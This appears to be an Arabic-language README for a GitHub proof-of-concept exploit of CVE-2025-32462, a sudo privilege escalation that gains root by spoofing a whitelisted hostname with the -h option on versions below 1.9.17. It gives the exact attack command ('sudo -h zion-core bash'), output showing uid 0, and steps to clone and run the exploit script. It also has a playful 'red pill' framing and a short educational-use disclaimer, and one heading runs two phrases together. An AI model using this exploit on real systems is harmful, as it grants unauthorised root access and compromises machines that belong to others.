
استغلال PoC لـ CVE-2025-32462، وهو تصعيد امتياز sudo عبر انتحال اسم المضيف. يوضح تجاوز القيود المستندة إلى اسم المضيف للحصول على وصول الجذر على الأنظمة الضعيفة (< 1.9.17).
تصعيد الامتيازات عبر تزييف اسم المضيف (CVE-2025-32462)
"تناول الحبة الزرقاء... تنتهي القصة. تناول الحبة الحمراء... تحصل على صلاحيات الجذر."
يُظهر هذا الاستغلال ثغرة تصعيد الامتيازات في سودو (CVE-2025-32462) حيث يمكن تجاوز القيود المستندة إلى اسم المضيف باستخدام العلامة -h. ينشئ الإثبات المفاهيمي (PoC) بيئة مستخدم مقيدة، ثم يهرب منها عن طريق تزييف اسم مضيف مدرج في القائمة البيضاء للحصول على وصول جذر.
[user@matrix-node]$ sudo -h zion-core bash # تزييف اسم المضيف المدرج في القائمة البيضاء
[root@matrix-node]# id # حصلت على صلاحية الجذر على اسم مضيف خاطئ!
uid=0(root) gid=0(root) groups=0(root)
-h في سودواستنساخ المستودع:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
جعله قابلًا للتنفيذ وتشغيله:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
اتبع المطالبات التفاعلية لعرض:
لأغراض تعليمية/بحثية فقط. استخدم فقط على الأنظمة التي تملكها أو لديك إذن باختبارها.